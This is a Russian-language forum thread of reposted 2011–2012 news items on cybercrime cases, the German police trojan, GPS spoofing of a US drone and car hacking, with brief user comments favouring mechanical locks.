Была сфотографирована поверхность стола, на котором находился прототип с тем, чтобы в случае утечки изображений планшета определить по текстуре древесины стола разработчика, ответственного за этот поступок;
О своей работе разработчик не имел права рассказывать никому, включая директора своей компании или жену.

SAWWA
28.09.2011, 16:11
В Белове Кемеровской области вынесен приговор хакерам
26 сентября 2011

По материалам Главного следственного управления ГУ МВД России по Кемеровской области Беловский городской суд вынес приговор троим хакерам, которые обвинялись в неправомерном доступе к охраняемой законом компьютерной информации.

Трое жителей города Белово попали в поле зрения оперативников отдела «К» Главного управления МВД России по Кемеровской области в конце 2009 года. Тогда с заявлениями в правоохранительные органы обратились несколько руководителей кузбасских фирм и представители интернет-провайдера. Одних удивляла сумма счета, предъявленного провайдером за пользование глобальной сетью, другие настаивали на том, что данная сумма - объективное начисление за использованный трафик.

Разбираться в ситуации полицейским долго не пришлось. После проведения необходимых оперативно-разыскных мероприятий было установлено, что за счет кузбасских фирм трое беловчан решили обновить свою фильмотеку. Как это сделать, придумал 25-летний программист, после чего научил этому и своих друзей. После сбора необходимых данных следователем ГСУ Главного управления МВД России по Кемеровской области в отношении мужчин были возбуждены уголовные дела по ст. 272 УК РФ «Неправомерный доступ к компьютерной информации».

Следователь и оперативники отдела «К» установили, что в распоряжении 25-летнего программиста появилась база с сетевыми реквизитами - логинами и паролями – клиентов одного из областных интернет-провайдеров. Именно эти сведения, позволяли обвиняемому создавать на своем компьютере новые учетные записи и входить в сеть под чужими именами. Логины и пароли, которые использовал хакер, принадлежали различным фирмам и компаниям. Несанкционированный доступ требовался ему, чтобы получить безлимитный доступ в глобальную сеть и увеличить скорость скачивания информации.

Однако пострадавшие фирмы были подключены к тарифу с оплатой за интернет-услуги по факту полученного объема информации. А поэтому каждый скачанный хакером гигабайт информации автоматически превращался для данных компаний в крупную сумму. Одной из первых пострадавших стала фирма из города Топки. В течение 11 дней за ее счет злоумышленник скачал более 50 Гб информации. Первый успешный выход в глобальную сеть за чужой счет развязал руки хакеру, и он продолжил свое криминально-виртуальное дело, причем посвятил в это и своих друзей, которые пожаловались ему на низкую скорость Интернета.

По версии следствия, передав им реквизиты, злоумышленник объяснил также, как их использовать. В течение месяца с помощью несанкционированного выхода в Интернет от имени топкинской фирмы, злоумышленники скачали более 300 Гб информации. Все это – фильмы с различных торрент-трекеров. Какого же было удивление директора компании, когда вместо привычных 1500 рублей в счете провайдера за пользование Интернет-услугами значилась сумма более 230 000 рублей. При этом компания постоянно сталкивалась с проблемами при работе в Интернете. Однако представители провайдера заявили, что ошибки быть не может - за всеми выходами в сеть следит автоматизированная система. Позже с выставленными счетами компании провайдера не согласились еще пять кузбасских фирм, расположенных в Кемерове и Тисуле.

За чужой счет хакеры обновляли свои фильмотеки почти два месяца. За это время они успели накачать почти 3 Тб (3000 Гб) данных, причинив тем самым ущерб на общую сумму более 2 000 000 рублей. В начале декабря 2009 года в домах 25-летнего программиста, инвалида детства первой группы, 25-летнего помощника машиниста тепловоза и 26-летнего продавца-консультанта прошли обыски, в результате которых были изъяты системные блоки их компьютеров. За время проведения предварительного следствия были опрошены пострадавшие, свидетели, фигуранты уголовного дела, проведены необходимые компьютерные экспертизы и пр.

Уголовные дела были объединены в одно производство. Следствием была собрана необходимая доказательственная база, изобличающая преступную деятельность обвиняемых. Уголовное дело вместе с утвержденным обвинительным заключением было передано в суд. Обвиняемым инкриминировалось совершение 10 преступлений, предусмотренных ч. 1 ст. 272 УК РФ «Неправомерный доступ к охраняемой законом компьютерной информации». В качестве наказания санкции данной статьи предусматривают до двух лет лишения свободы.

Обвиняемые ходатайствовали перед судом о рассмотрении их дела в особом порядке. Двоих обвиняемых Беловский городской суд признал виновными в совершении инкриминируемых им преступлений. Организатору незаконной схемы 26-летнему Роману Ильину назначено наказание в виде 1 года 6 месяцев лишения свободы условно. Второй обвиняемый Сергей Кобанеев получил 1 год 10 месяцев лишения свободы условно. В отношении третьего фигуранта по решению суда было прекращено уголовное преследование в связи с примирением сторон – он полностью возместил пострадавшим причиненный материальный ущерб. Приговор суда вступил в законную силу.

Пресс-служба ГУ МВД России по Кемеровской области
http://mvd.ru/news/show_97454/

SAWWA
08.10.2011, 02:44
Мурманские полицейские вычислили хакера, похитившего у гражданина героя компьютерной сетевой игры
7 октября 2011

На сайт УМВД России по Мурманской области обратился житель Апатитов, сообщивший, что, по имеющейся у него информации, некий злоумышленник взломал аккаунт в сетевой компьютерной игре, принадлежащий одному из его знакомых, и присвоил виртуального персонажа, а также все накопления игрока - виртуальные оружие, доспехи, деньги.

Проверку по данному факту провели оперативники отдела «К» УМВД России по Мурманской области, которые выявили проживавшего в Ростовской области хакера, который действительно сумел взломать пароль потерпевшего и завладеть его персонажем.

Восстановив пароль, и вновь получив возможность управлять героем, потерпевший обнаружил, что рисованный персонаж «раздет» - пропали все виртуальные накопления, которые геймер собирал несколько лет. Вскоре в чате игры он обнаружил свое «имущество», выставленное на продажу. Похититель хотел реализовать его через Интернет-торги за тысячу рублей, но, узнав, что бывший владелец претендует на возвращение пропажи, повысил цену в пять раз.

В отношении данного гражданина возбуждено уголовное дело по факту неправомерного доступа к компьютерной информации. Оперативники отмечают: дела по факту взлома аккаунтов им в руки попадают нередко, но вот взлом игрового пространства впервые в России лег в основу уголовного преследования.

Пресс-служба УМВД России по Мурманской области
http://mvd.ru/news/show_97863/

SAWWA
08.10.2011, 03:09
В Австрии хакеры взломали базу данных полиции
27.09.2011 16:31

Австрийские участники хакерской группы Anonymous сообщили о краже личных данных 25 тысяч австрийских полицейских. Об этом во вторник написала местная газета Wiener Zeitung, передает телеканал «Россия 24».

Хакеры сообщили о своём взломе в блоге в сети Twitter. По их словам, среди украденных данных имена, даты рождения и домашние адреса. Руководство полиции опасается, что похищенной информацией могут воспользоваться преступники, чтобы свести счёты с полицейскими, которые расследовали их дела.

Ранее хакеры взломали сайты социалистической партии Австрии, партии “зелёных” и австрийской Партии свободы. Также в их списке правителственные учреждения и крупные компании ряда стран. На их счету взломанная база данных, в которой хранились личные данные 90 000 военнослужащих США, база данных НАТО, документы о "Газпроме" и ещё много нашумевших взломов. Всю украденную информацию Anonymous выкладывают в открытую сеть на популярных торрент-трекерах.
http://www.fontanka.ru/2011/09/27/117/

SAWWA
15.10.2011, 00:27
Дознаватели Оренбурга передали в суд дело по факту кражи, совершенную по инструкции из Интернета
14 октября 2011

Сотрудниками дознания отдела полиции № 3 УМВД России по г. Оренбургу в суд передано уголовное дело, возбужденное по факту кражи из отдела торгового комплекса «Армада».

Как выяснилось в ходе расследования дела, 22-летний парень, регулярно выходил в сеть Интернет, где просматривал страницы, содержащие информацию о видах и способах совершения различных преступлений. На одном из сайтов он обнаружил необычный способ хищения вещей, без удаления защитных устройств, ценников и беспрепятственного прохождения через металлодетектор.

Молодой человек изготовил специальную сумку, которая якобы должна была погасить всё излучение внутри содержимого, при прохождении ворот. С изготовленной сумкой он пришёл в один из отделов торгового центра «Армада», где положил во внутрь ручной клади шорты.

Однако план злоумышленника не сработал и на выходе из отдела сработал сигнал. Сотрудники охраны проверили сумку и обнаружили шорты, на которых были ценник и защитные клипсы.

На место была вызвана следственно-оперативная группа отдела полиции № 3 УМВД России по г. Оренбургу. Полицейские в присутствии понятых изъяли похищенное и задокументировали факт кражи.

«Было возбуждено уголовное дело по статье 158 УК РФ «кража». Парень на момент совершения преступления имел непогашенную судимость, и более того ранее он уже неоднократно попадал в поле зрения правоохранительных органов. Стоит отметить, что он из благополучной семьи, а на допросах рассказал, что причиной преступления стал банальный азарт», - рассказала старший дознаватель Ольга Лаптева.

Пресс-служба УМВД России по Оренбургской области
http://mvd.ru/news/show_98127/

SAWWA
01.11.2011, 04:00
пожалуй, самый надёжный способ спрятать информацию в определённом случае - её полное уничтожение посредством разрушения её носителя, всегда есть копии на удалённых серверах... а

http://www.youtube.com/watch?v=eOY_fCTjYc0&feature=feedrec_grec_index
даст возможность улучшить сон тому, у кого есть что терять .. главное - пароли и адреса не хранить на виду

SAWWA
10.11.2011, 03:45
http://www.dw-world.de/dw/article/0,,15447485,00.html
Хакеры обвиняют уголовную полицию ФРГ в нарушении закона

"Бундестроянец" позволяет значительно превышать установленные законом рамки слежки, уверены эксперты. Хакеры обнаружили также многочисленные дефициты в системе безопасности программы-шпиона уголовной полиции ФРГ.
вторы программы, используемой немецкой уголовной полицией для проведения онлайн-обысков, по всей видимости, были фанатами "Звездных войн". Пароль, необходимый для передачи полученных данных на сервер в США, повторяет имена персонажей знаменитой киноэпопеи Джорджа Лукаса: C3PO-r2d2-POE. Немецкие хакеры взломали полицейскую программу-шпион, сообщила в воскресенье, 9 октября, немецкая газета Frankfurter Allgemeine Sonntagszeitung со ссылкой на Союз компьютерных экспертов и профессиональных хакеров Chaos Computer Club (CCC).
После взлома так называемых "бундестроянцев" CCC обвинил немецкие следственные органы в грубом нарушении закона. По словам пресс-секретаря CCC Франка Ригера (Frank Rieger), программа позволяет уголовной полиции ФРГ осуществлять посягательство на личную сферу граждан в гораздо больших масштабах, чем это разрешается немецким законодательством.

"Глубоко интимные данные"
"Изученные троянцы не только позволяют выведывать глубоко интимные данные, но и предлагают функцию дистанционного управления для загрузки и приведения в действие любых программ, способных нанести какой-либо ущерб", - заявил вечером 8 октября CCC.

Программа-троянец используется немецкими следователями в целях борьбы с терроризмом и предназначена для прослушивания разговоров через программы VoIP-телефонии типа Skype. Однако, по мнению CCC, она позволяет следователям дистанционно управлять микрофоном, видеокамерой и клавиатурой компьютеров, за которыми осуществляется слежка. Таким образом, уверены компьютерные эксперты, с помощью программ-шпионов правоохранительные органы могут вести подслушивание и шпионаж через интернет.
Кроме того, представители ССС обнаружили множество дыр в системе защиты программы, которые делают возможным доступ к данным третьим лицам. А сервер, на который "троянец" посылает всю информацию, находится в США, то есть вне юрисдикции немецких законов, сообщила организация.

Политики обеспокоены
Министр юстиции ФРГ Сабине Лойтхойссер-Шнарренбергер (Sabine Leutheusser-Schnarrenberger) выразила обеспокоенность в связи с сообщением о взломе программы. "Аргументы истцов по делу об онлайн-обысках в Федеральном конституционном суде, относящиеся к технической стороне программы, теперь получили подтверждение, и это внушает серьезное беспокойство", - подчеркнула она.
С критикой выступила и Партия пиратов. "Государство должно защищать граждан, а не подвергать риску их безопасность из-за собственной некомпетентности или преднамеренно", цитирует заявление партии агентство Reuters.



Автор: Ольга Демидова

Редактор: Сергей Гуща

SAWWA
18.11.2011, 14:24
http://www.dw-world.de/dw/article/0,,14949858,00.html
Эксперт: Жизненно важные IT-системы нужно изолировать
Своевременно обнаружить и устранить последствия хакерской атаки высокого уровня - задача практически невыполнимая. Поэтому создание национальных центров киберзащиты - тупиковый путь, убежден эксперт Сандро Гайкен.


1 апреля в Бонне приступает к работе Федеральный центр киберзащиты (Cyberabwehrzentrum), который должен уберечь жизненно важные IT-системы Германии от нападений промышленных шпионов и киберсолдат недружественных государств. Перед сотрудниками центра поставлена задача своевременно обнаруживать и эффективно отражать кибератаки. Немецкий эксперт по IT-безопасности Сандро Гайкен (Sandro Gaycken) убежден, что миссия эта - невыполнима, по крайней мере, в нынешних условиях. Почему сегодня так легко взломать даже очень комплексную систему и как сделать IT-системы менее уязвимыми, эксперт рассказал в интервью Deutsche Welle.

Deutsche Welle: Господин Гайкен, сможет ли центр киберзащиты справляться с поставленными перед ним задачами?

Сандро Гайкен: Это зависит от того, с кем там будут бороться. Если речь идет о хакерах-самоучках и мелких мошенниках, то да, сможет. Правда, тогда необходимость в новой структуре отпадает: этим уже занимается Федеральное ведомство по безопасности в информационной технике (BSI). Если же мы говорим о кибератаках, исходящих от организованных преступных группировок и от военных структур враждебных государств, то тут специалисты центра совершенно беспомощны.

Боюсь, что здесь, в Германии, до сих пор не осознали, что кибератаки перешли на качественно новый уровень. Сегодня мы имеем дело не с подростками и мелкими бандами, а с военными. А военные используют другие методы. Они не кидаются камнями и не стреляют из пистолетов, у них в распоряжении - профессиональная разведка и тяжелая артиллерия. Поэтому своевременно обнаружить кибератаку такого уровня - практически невозможно. Опыт показывает, что на это уходит в среднем 2,5 года. За это время атакующая сторона не только успеет нанести огромный ущерб, но и полностью замести следы.

- Вы напрямую связываете уязвимость операционных систем со степенью сложности их программирования. Почему?

- Взломать комплексную информационную систему легче. Исходный код операционной системы Windows 7 содержит 86 миллионов строк. Попробуйте обнаружить в таком море данных ошибку, занесенную злоумышленником. Недавно такая неприятность произошла с Linux: в одном-единственном месте исходника хакер добавил знак равенства. Это привело к изменению величины одного параметра. Обнаружить такую ошибку практически невозможно, это все равно, что искать иголку в стоге сена.

- Предположим, что IT-специалистам все же удалось выявить кибератаку, насколько реально отследить и привлечь к ответственности исполнителя и заказчика?

- Как правило, источник кибератаки пытаются определить по "почерку". Например - по характерным для того или иного государства методам программирования, IP-адресу, происхождению "флэшки", если таковая была обнаружена. Однако всеми этими данными довольно легко манипулировать. К примеру, в промышленном шпионаже широко применяется практика симулирования "китайского следа". То есть, даже если кибератака осуществляется из Западной Европы, хакер пишет троянскую программу так, чтобы у жертвы сложилось впечатление, что напали на него китайцы.

Таким образом, хакеры могут использовать существующие конфликты для того, чтобы искусно замести следы. Это очень опасно, особенно тогда, когда мы имеем дело с военной операцией. Например, если какое-нибудь государство нападает на Иран, делая вид, что оно - США.

- Получается какая-то безвыходная ситуация: защитить IT-системы сложно, своевременно выявить и залатать "рану" нереально, обнаружить вредителя невозможно…

- Выход есть, но выстроить такую систему защиты очень дорого. Нужно отказаться от централизации усилий по отражению кибератак. Вместо того чтобы создавать центр, следует усилить средства самозащиты, так сказать, на местах - в IT-системах, которые являются объектами кибернападений. Для этого, во-первых, нужно принципиально отказаться от стремления объединять все в единую глобальную сеть. Наоборот, чем на более мелкие кусочки мы "раздробим" существующие сети, тем дороже и сложнее будет на них нападать. Ведь тогда для каждого элемента системы нужно будет нанимать отдельного хакера, который должен программировать отдельный троян, искать отдельную брешь.

Кроме того, это бы позволило оптимизировать отдельные IT-системы, подобрать для них индивидуальные решения, которые в свою очередь сделали бы их менее уязвимыми. Сейчас ведь идет подгонка под коммерческое ПО, которое рассчитано на массы. Эта стандартизация осуществляется в ущерб безопасности. Если же отказаться от использования коммерческого софта и перейти на индивидуальные решения, то уязвимых мест в IT-системах станет меньше.

- Насколько перспективен такой подход в Германии? Рассматривает ли такую альтернативу немецкое правительство?

- Дискуссии на эту тему ведутся только в кулуарах, поскольку задача эта - сложная и дорогостоящая. Кроме того, на политиков серьезно давит лобби производителей коммерческого ПО. Ведь им нужно продолжать сбывать свои сетевые решения. А решения эти никакой угрозы для профессиональных хакеров не представляют.

Беседовала: Татьяна Петренко
Редактор: Сергей Гуща
............
в Поднебесной любят делать изделия с похожими ключами... думается. что электронные тоже не минёт сия чаша..... сетевые технологии ещё больше упрощают жизнь профессиональным взломщикам

ПОТОМУ ЭЛЕКТРОНЫЕ ЗАМКИ. ОТКРЫВАЮЩИЕСЯ ЧЕРЕЗ ИНТЕРНЕТ, СОТОВЫЙ ТЕЛЕФОН И Т.Д. .. БЕСКОНТАКТНЫЕ КАРТЫ И ЧИПЫ ТИПА RFID И Т.Д. МЕТОК НА ПОРЯДОК БОЛЕЕ УЯЗВИМЫ.. механика .. механические замки пожалуй, навсегда останутся единственным неподкупным средством обеспечения конфиденциальности данных.. электронные средства взлома можно применять не имея никакой квалификации.. вот для открывания отмычками необходим определённый опыт.. время.. некоторые склонности к тонким работам... каменщик алмазной гладилкой замок типа Апекс на прочёс не откроет...

SAWWA
26.11.2011, 05:02
http://www.zamkidveri.com/forum/images/imported/2011/11/3dn-1.gif?7389774
Ультрабезопасные пластиковые карты выходят на рынок
Павел Котов

Азиатские банки приступили к внедрению пластиковых карт нового поколения. Эти карты включают в себя компактный ключ безопасности и дисплей на электронных чернилах. На него выводятся одноразовые цифровые коды, которые обеспечивают дополнительный уровень защиты при совершении покупок онлайн и работе с банковскими системами через Интернет.

http://www.youtube.com/watch?v=UYI4jxnyZwA&feature=player_embedded
Для того чтобы осуществить перевод денег, владелец карты нажимает на маленькую кнопку с тыльной стороны карты, и на дисплей на ее лицевой стороне выводится одноразовый код, состоящий из шести-восьми цифр. Он заменяет код безопасности на теперешних картах, который располагается на обратной стороне и состоит из трех цифр. Получается полноценное электронное устройство, которое требует автономного питания. Здесь действительно есть встроенная одноразовая батарея, и ее заряда хватит на три года, столько обычно и живет нормальная банковская карта. Южная Корея и Япония уже выпустили в оборот несколько миллионов карточек нового образца.
http://www.3dnews.ru/news/

Zamok
29.11.2011, 17:05
ну это ясно...
те, кто создают вирусы - они же создают и антивирусы)

SAWWA
29.11.2011, 18:29
лишь механика способна обеспечить гарантированно наличие только одного ключа.... сохранность которого на совести владельца

SAWWA
17.12.2011, 01:56
Сотрудники полиции предотвратили хищение свыше 11 млн. рублей со счетов 220 держателей банковских карт
16 декабря 2011

Сотрудники Главного управления экономической безопасности и противодействия коррупции (ГУЭБиПК) МВД России предотвратили хищение свыше 11 млн. рублей со счетов 220 держателей банковских карт.

В МВД России обратился председатель правления одного из крупных коммерческих банков с заявлением о том, что с начала года их службой безопасности зафиксировано десятикратное увеличение несанкционированного снятия денежных средств через банкоматы в различных федеральных округах России, а также за границей.

В ходе оперативно-розыскных мероприятий в поле зрения сотрудников полиции попали двое граждан Республики Молдова, которые установили на два банкомата на Мичуринском проспекте скимминговые устройства - специальные технические средства для негласного получения сведений, содержащихся на магнитных полосах банковских расчетных карт и ПИН кодов к ним.

На следующий день злоумышленники вернулись, чтобы снять установленные накануне считывающие устройства. После демонтажа оборудования они были задержаны оперативниками ГУЭБиПК и БСТМ МВД России с поличным.

Проведенное исследование скимминговых устройств показало, что в их памяти содержалась информация о 220 банковских картах клиентов, с доступным остатком денежных средств более 11 млн. рублей. Если бы не своевременное вмешательство оперативников, сбережения граждан могли быть похищены мошенниками.

В отношении подозреваемых возбуждено уголовное дело по признакам преступления, предусмотренного ч. 1 ст. 30 и ч. 4 ст. 158 УК РФ «Приготовление к краже» и избрана мера пресечения – заключение под стражу.

Пресс-служба ГУЭБиПК МВД России
http://www.mvd.ru/news/show_100103/

SAWWA
23.12.2011, 04:34
http://www.3dnews.ru/offsyanka/621880/
О дроне в угоне
Автор: Бёрд Киви
23.12.2011

Операцию Ирана по захвату новейшего американского самолета-шпиона можно назвать высшим пилотажем хакинга. Берд Киви, разбираясь в деталях угона, выходит на уязвимости в системе GPS, позволяющие проделать подобное и с другими летательными аппаратами, не обязательно военного назначения

На протяжении всего декабря 2011 года главной темой в непростых ирано-американских отношениях оказался эффектный захват иранцами разведывательного беспилотного самолета США. Или шпионского «дрона», как их теперь принято называть под влиянием кинофильмов. И поскольку данный сюжет содержит в себе очень существенный технический элемент, непосредственно связанный с компьютерным хакингом, явно имеет смысл рассказать об этой истории поподробнее.

Начиналось все с того, что в первых числах декабря иранское агентство новостей IRNA кратко сообщило об успехе вооруженных сил Ирана, которым удалось засечь и приземлить вторгшийся в страну самолет-разведчик США. Итогом же этой операции стал попавший в руки (и практически невредимый) иранских военных шпионский дрон-«невидимка» RQ-170 Sentinel.

Первые строго засекреченные полеты в реальных боевых условиях RQ-170 начал осуществлять в 2007 году с американской авиабазы Kandahar в Афганистане. Там же этот аппарат — из-за его необычной футуристической формы — был впервые замечен и сфотографирован репортерами. С тех пор, сразу после публикации фото в СМИ, за дроном закрепилось неофициальное прозвище Beast of Kandahar, то есть «кандагарское чудовище».

Известно, что непосредственное управление разведывательными дронами RQ-170 осуществляют как ЦРУ США, так и военно-воздушные силы. Действуют они через наземные станции, расположенные в штате Невада — на авиабазе Creech и на полигоне Tonopah. Официально разведывательные операции дрона RQ-170 в составе ВВС США были раскрыты в декабре 2009 года. Тогда же пресса Южной Кореи сообщила о замеченных летных испытаниях RQ-170 в этой стране, где данным аппаратом собираются заменить самолет U-2 — для разведки над Северной Кореей.24466

http://www.zamkidveri.com/forum/images/imported/2011/12/4_0-1.jpg
Как поясняет иранский инженер, «GPS-навигация — самое слабое место данной технологии. Наводя шумовое глушение сигналов на каналы связи, вы заставляете эту птицу перейти в режим автопилота. И вот там-то птичка и теряет свои мозги»...

Весьма широко используемая при разнообразных хакерских атаках техника «спуфинга», или подделки сигнала, которую использовали иранцы, принимает в расчет точные параметры геолокации, прописанные в памяти дрона, такие как данные о высоте, долготе и широте места посадки. Грамотно воспользовавшись этими данными, иранцы заставили дрона на автопилоте «садиться самостоятельно там, где мы этого хотели, — без необходимости вскрывать защиту сигналов связи и дистанционного управления», поступающих из командного центра в США.

Как свидетельствует иранский источник, ключевую роль в успехе операции захвата сыграли технологии, уже освоенные ранее, благодаря обратной инженерной разработке нескольких менее сложных американских дронов, захваченных или сбитых за последние годы. Не менее важными стали преимущества слабых и легко поддающихся манипуляциям спутниковых сигналов GPS, на основе которых дроны вычисляют свое местоположение и скорость.

Западные эксперты по военной электронике и несколько открыто опубликованных статей, посвященных GPS-спуфингу, свидетельствуют, что сценарий, описанный иранским инженером, вполне правдоподобен и реалистичен. «Даже современные — боевого уровня — GPS-приемники крайне уязвимы для манипуляций, — подтверждает бывший специалист ВМС США по электронной войне Роберт Денсмор (Robert Densmore). — Определенно возможно перекалибровать GPS-устройство на борту дрона таким образом, чтобы он на автопилоте полетел другим курсом. Я бы не сказал, что это легко, однако технологии для этого имеются».
http://www.zamkidveri.com/forum/images/imported/2011/12/GPSSatellite-1.jpg



Как поясняет иранский инженер, причастный к захвату злобного кибервредителя «GPS-навигация — самое слабое место данной технологии. Наводя шумовое глушение сигналов на каналы связи, вы заставляете эту птицу перейти в режим автопилота. И вот там-то птичка и теряет свои мозги»...

Весьма широко используемая при разнообразных хакерских атаках техника «спуфинга», или подделки сигнала, которую использовали иранцы, принимает в расчет точные параметры геолокации, прописанные в памяти дрона, такие как данные о высоте, долготе и широте места посадки. Грамотно воспользовавшись этими данными, иранцы заставили дрона на автопилоте «садиться самостоятельно там, где мы этого хотели, — без необходимости вскрывать защиту сигналов связи и дистанционного управления», поступающих из командного центра в США.

Как свидетельствует иранский источник, ключевую роль в успехе операции захвата сыграли технологии, уже освоенные ранее, благодаря обратной инженерной разработке нескольких менее сложных американских дронов, захваченных или сбитых за последние годы. Не менее важными стали преимущества слабых и легко поддающихся манипуляциям спутниковых сигналов GPS, на основе которых дроны вычисляют свое местоположение и скорость.

Западные эксперты по военной электронике и несколько открыто опубликованных статей, посвященных GPS-спуфингу, свидетельствуют, что сценарий, описанный иранским инженером, вполне правдоподобен и реалистичен. «Даже современные — боевого уровня — GPS-приемники крайне уязвимы для манипуляций, — подтверждает бывший специалист ВМС США по электронной войне Роберт Денсмор (Robert Densmore). — Определенно возможно перекалибровать GPS-устройство на борту дрона таким образом, чтобы он на автопилоте полетел другим курсом. Я бы не сказал, что это легко, однако технологии для этого имеются».

При всех достоинствах GPS-навигации в ней отсутствует система идентификации гарантированно «своих» спутников, что открывает довольно широкий простор для недружественных экспериментов

Впервые о своей способности делать такие вещи Иран объявил еще в сентябре — когда с Запада стало нарастать давление по поводу иранской ядерной программы. Генерал Мохарам Холизаде (Moharam Gholizadeh), заместитель командующего ПВО по радиоэлектронной борьбе в составе Корпуса стражей исламской революции, в общих чертах описал агентству Fars News то, как Иран может изменять маршруты направляемых с помощью GPS ракет. К дронам же, летающим существенно медленнее ракет, эта тактика применима в еще большей степени.

Цитируя слова иранского генерала, у них «имеется в работе проект, который на шаг впереди обычных технологий глушения и подразумевает обман агрессивных систем… так что мы можем задать для системы нашу собственную информацию, отчего маршрут ракеты изменится в том направлении, которое мы пожелаем». Переходя же к обсуждению беспилотных самолетов, Холизаде отметил, что «все перемещения этих вражеских дронов» отслеживаются, а срыв их полетов «всегда стоит в нашей повестке дня».

Некоторое время спустя это интересное интервью, опубликованное на персидском языке (более известном как фарси. — прим. редакции) веб-сайтом Fars News, было оттуда убрано. А затем, в ноябре 2011-го, относительно молодой генерал Холизаде скоропостижно скончался от сердечного приступа. Некоторые иранские новостные сайты назвали эту неожиданную смерть довольно подозрительной — предположив, что и эксперт по радиоэлектронной борьбе мог стать жертвой тайной войны против Ирана.

Что же касается американской позиции в данном противостоянии, то официальные лица США весьма скептически воспринимают декларируемые Ираном возможности, по-прежнему склоняясь к версии о сугубо внутреннем отказе оборудования на борту дрона RQ-170. Однако при этом они никак не могут объяснить, каким образом летающий на высоте свыше 15 километров самолет сумел попасть в руки Ирана практически целехоньким.


Куда больше известна недавняя история о том, как некие умельцы из Ирана сумели взломать криптографические сертификаты безопасности Google. Компания, ставшая жертвой хакерского взлома, заявила, что «косвенные улики» указывают на организованную государством атаку, исходившую из Ирана и нацеленную на шпионаж за пользователями электронной почты и других коммуникационных сервисов Google.

Как сообщил ныне иранский инженер в интервью, хакинг защищенных GPS-координат на борту дрона Sentinel с технической точки зрения был ничем не сложнее атаки в отношении Google.

Хорошо известная уязвимость

Не секрет, что военные США на протяжении многих лет ищут способы эффективно усилить защиту систем навигации дронов или найти адекватную альтернативу системе GPS. Еще в 2003 году командой специалистов Лос-Аламосской национальной лаборатории (Vulnerability Assessment Team, VAT) было опубликовано исследование, разъясняющее то, насколько легко можно забивать слабые спутниковые сигналы GPS более сильным локальным излучением сигналов глушения или ложных сигналов спуфинга.

При лобовой атаке, отмечали авторы, может происходить подача в GPS-приемник поддельных GPS-сигналов таким образом, что устройство начинает полагать себя находящимся в пространстве и времени где-то там, где на самом деле его нет. При более же сложной спуфинг-атаке противник может посылать движущейся цели такие ложные сигналы, которые сначала дают ее истинное положение, а затем постепенно уводят цель к другой, ложной позиции.

Как свидетельствуют совсем свежие публикации на ту же тему, эффективно устранить давно выявленную проблему не удалось и по сию пору.
http://www.zamkidveri.com/forum/images/imported/2011/12/Cyber_warfare-1.jpg
дроны США подвержены следующим угрозам:

Глушение каналов коммерческой спутниковой связи (SATCOM) — это широко доступная технология. Для неприятеля она может выступать или как эффективный инструмент подавления каналов передачи данных, или как способ блокирования сигналов контроля и управления аппаратом.
Оперативные нужды могут требовать использования нешифрованных каналов передачи данных — для предоставления вещательных сервисов наземным войскам, не имеющим допуска к секретной информации (криптоключам). Перехват этих каналов — известная уязвимость, доступная для использования противником при минимальных затратах.
Спуфинг или каналы захвата, которые способны приводить к нанесению вреда собственно миссии дрона или даже к потере самой платформы.

«имеется широкий диапазон методов, которые целеустремленный противник может использовать для атак на системы дистанционного управления и навигации дронов». В частности, отчет упоминает три категории подобных угроз (не вдаваясь в дальнейшие детали):

Небольшие и технически простые GPS–глушилки могут быть легко сконструированы и использованы в деле даже технически непродвинутым противником. В условиях ограниченной области функционирования дрона такие устройства будут вполне эффективны.
Также для нарушения навигационных возможностей дистанционно пилотируемых дронов вполне доступна технология GPS–репитеров (повторители сигнала).
Киберугрозы представляют собой основной вызов для будущего применения БПЛА. Кибератаки могут воздействовать как на бортовые, так и на наземные системы, а методы воздействия могут простираться от простых асимметричных атак, типа глушения, до высокосложных электронных систем и программных атак.

Беззащитный дрон

Как свидетельствуют погруженные в предмет специалисты, ни одна из существующих ныне систем GPS сама по себе не является «стойкой к спуфингу» — и тому есть несколько весьма серьезных причин.

Самая простая из них заключается в том, что не представляется возможной реализация очень важной вещи, а именно надежного определения подлинности источника сигнала в условиях «одностороннего» канала связи. В такой ситуации хорошо срабатывает известная хакерская атака повторением сигнала (replay attack). Иначе говоря, для реальной надежности обязательно требуется вторичный канал того или иного рода. Причем желательно такой, который нельзя было бы заглушить.

Почему повреждено брюхо дрона

Как рассказал все в том же интервью для Christian Science Monitor иранский инженер, их проект по отслеживанию шпионских дронов стартовал в 2007 году. Затем, в 2009 году, его существенно усилили и предали гласности — тогда же, когда RQ-170 стал впервые официально использоваться в Афганистане с оснащением новейшими по тем временам системами слежения и разведки.

В январе 2011-го Иран объявил, что сбил или захватил два обычных (не оснащенных технологией Stealth) дрона, в июле нынешнего года несколько аппаратов были продемонстрированы иранцами российским специалистам, ну а в декабре состоялась уже известная «премьера» стелс-дрона RQ-170 по государственному телевидению. Внимательные зрители этого сюжета наверняка обратили внимание на заметную выбоину на левом крыле самолета и на то, что брюхо дрона было тщательно прикрыто постаментом с антиамериканскими транспарантами.

Иранский инженер объяснил это так: «Если вы посмотрите на то место, где мы заставили дрон приземлиться, и на родную базу этой птицы, то они имеют почти ту же самую высоту над уровнем моря. Но была, однако, проблема в нескольких метрах разницы между точной высотой [взлетно-посадочных полос]. Так что брюхо птицы все же несколько повредилось при посадке — потому его и прикрыли»


на самом деле если перейти от космоса и неба к земле, то в системах безопасности всё больше используются разного рода технологии . имеющие сродство с описанными и с подобными уязвимостями, что находчивые парни и применяют

SAWWA
29.01.2012, 20:48
Автор: Бёрд Киви
27.01.2012
В последние лет двадцать число украденных автомобилей стабильно сокращалось — по мере того как новые модели оснащались электронными противоугонными технологиями. Но постепенно автомобильная электроника начинает играть на руку злоумышленникам

В самый канун новогодних праздников одна из видных американских газет, Mercury News, решила взбодрить своих читателей страшилками про автомобильный хакинг.

Газета предложила представить совершенно кошмарную ситуацию: «В утренний час пик террористы Аль-Каиды дистанционно отключают тормоза на тысячах и тысячах машин, движущихся по автострадам Сан-Франциско и его окрестностей. Понятно, что одновременно отказавшие тормоза машин на переполненных дорогах мегаполиса приводят к массовому хаосу, смертям и разрушениям. Невероятно, скажете вы? А вот эксперты по взлому автомобильных компьютерных систем считают иначе».

По мере того, продолжает газета, как легковые машины и грузовики все плотнее оснащаются мозговитыми устройствами для автоматизации работы практически всей техники на борту автомобиля — от подушек безопасности и контроля давления в шинах до систем управления двигателем и тормозами, транспортное средство становится все более и более уязвимым в отношении кибератак. Об этом свидетельствует постоянно растущее число исследований, проводимых специалистами по компьютерной безопасности в университетах и фирмах инфозащиты.
Люди и сейчас недурно справляются с организацией себе приключений на дороге. А если им поможет еще и Аль-Каида!

